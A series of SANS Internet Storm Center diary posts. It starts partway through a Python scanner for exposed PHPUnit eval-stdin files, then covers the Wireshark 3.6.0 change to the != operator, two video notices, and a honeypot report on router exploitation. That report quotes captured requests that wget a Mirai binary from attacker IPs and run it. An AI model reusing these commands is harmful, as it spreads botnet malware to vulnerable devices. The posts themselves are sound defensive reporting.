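                    "eval_stdin_present": os.path.isfile(os.path.join(directory, EVAL_STDIN)),
                })
    return sorted(findings, key=lambda finding: finding["project"])


if __name__ == "__main__":
    for finding in hunt(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(finding)
```
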

[1] https://nvd.nist.gov/vuln/detail/CVE-2017-9841
[2] https://www.imperva.com/blog/the-resurrection-of-phpunit-rce-vulnerability/


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 3.6.0 Released, (Mon, Nov 29th)

Wireshark version 3.6.0 was released.

It has many updates and bug fixes.

There is one change I want to highlight: the behavior of operator != (not equal) in display filters. Starting with version 3.6.0, expression "a != b" is the same as "!(a == b)".

This was not the case prior to version 3.6.0, and it's something you might have noticed (I'm sure you are aware of this if you ever took my Wireshark trainings 😉 ).

When the syntax of a display filter is correct, the background color of the display filter field is green:

If the syntax is wrong, the background color is red (<> is not a valid operator here):

And if you would use the != operator, then the background color would be yellow:

Yellow means that the syntax is correct, but that the semantics might not be what you expect. That's because fields can have multiple values. For example, field ip.addr has 2 values (ip.src and ip.dst). But ip.src can also have multiple values, for example when an IP packet is embedded inside another IP packet (an ICMP packet for example).

The yellow color is a warning: check if the semantics are what you expect, and if not, rewrite your expression: "a != b" -> "!(a == b)". This would give you a green color:

Starting with version 3.6.0, the semantics of operator != have changed. "a != b" is semantically the same as "!(a == b)" now, and the yellow color no longer appears:

FYI: if you need the "old" semantics, use operator ~= (any_ne).
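
The difference between the two meanings of != is easiest to see on multi-valued fields. The following is an added example, not Wireshark code: a small Python model of ==, != and ~= over constructed packets, covering only packets in which the field is present. The packet list and function names are assumptions made for the example.

```python
def field_values(packet, field):
    """All values a field takes in one packet; ip.addr covers ip.src and ip.dst."""
    if field == "ip.addr":
        return packet.get("ip.src", []) + packet.get("ip.dst", [])
    return packet.get(field, [])


def matches(packet, field, op, value, legacy=False):
    """Evaluate 'field op value'; legacy=True models != before version 3.6.0."""
    values = field_values(packet, field)
    any_eq = any(v == value for v in values)   # at least one value equals
    any_ne = any(v != value for v in values)   # at least one value differs
    if op == "==":
        return any_eq
    if op == "~=":                             # any_ne, the "old" semantics
        return any_ne
    if op == "!=":
        return any_ne if legacy else not any_eq
    raise ValueError(f"unsupported operator: {op}")


def display_filter(packets, field, op, value, legacy=False):
    """Return the 1-based numbers of the packets that pass the filter."""
    return [
        number
        for number, packet in enumerate(packets, 1)
        if matches(packet, field, op, value, legacy)
    ]


# Constructed packets. Packet 3 models an ICMP error that embeds the IP header
# of the original packet, so ip.src and ip.dst each carry two values.
PACKETS = [
    {"ip.src": ["10.0.0.1"], "ip.dst": ["10.0.0.2"]},
    {"ip.src": ["10.0.0.3"], "ip.dst": ["10.0.0.4"]},
    {"ip.src": ["10.0.0.5", "10.0.0.3"], "ip.dst": ["10.0.0.3", "10.0.0.1"]},
]

if __name__ == "__main__":
    for legacy in (True, False):
        label = "before 3.6.0" if legacy else "3.6.0 and later"
        print(label, display_filter(PACKETS, "ip.addr", "!=", "10.0.0.1", legacy))
```
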

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Video: YARA Rules for Office Maldocs, (Sun, Nov 28th)

In this video, I show and explain the YARA rules I covered in diary entries "Extra Tip For Triage Of MALWARE Bazaar's Daily Malware Batches" , "Simple YARA Rules for Office Maldocs" and "YARA Rule for OOXML Maldocs: Less False Positives".

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Video: SANS Holiday Hack Challenge 2021 Q&A with Ed Skoudis, (Sat, Nov 27th)

The 2021 SANS Holiday Hack Challenge begins mid-December, but you can already watch "SANS Holiday Hack Challenge 2021 Q&A with Ed Skoudis" on YouTube.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Searching for Exposed ASUS Routers Vulnerable to CVE-2021-20090, (Fri, Nov 26th)

Over the past 7 days, my honeypot captured a few hundred POST requests for a vulnerability which appeared to be tracked as a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware [1][2]. If successfully exploited, it could allow unauthenticated remote actors to bypass authentication and add the router to the Mirai botnet.

20211125-135312: 192.168.25.9:80-103.70.155.156:44670 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//152.89.239.12/bins/mpsl;chmod 777 *;./mpsl selfrep.asus

20211126-090429: 192.168.25.9:80-72.141.208.113:39036 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//185.245.96.227/bins/mpsl;chmod 777 *;./mpsl selfrep.asus

URL Indicators

http[:]//152.89.239.12/bins/mpsl
http[:]//185.245.96.227/bins/mpsl

SHA256

63e70f283398248d912d42d2963cff7965415e7bb57b43880873e570a07e8bf6

[1] https://nvd.nist.gov/vuln/detail/CVE-2021-20090
[2] https://www.tenable.com/security/research/tra-2021-13
[3] https://www.virustotal.com/gui/file/63e70f283398248d912d42d2963cff7965415e7bb57b43880873e570a07e8bf6

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.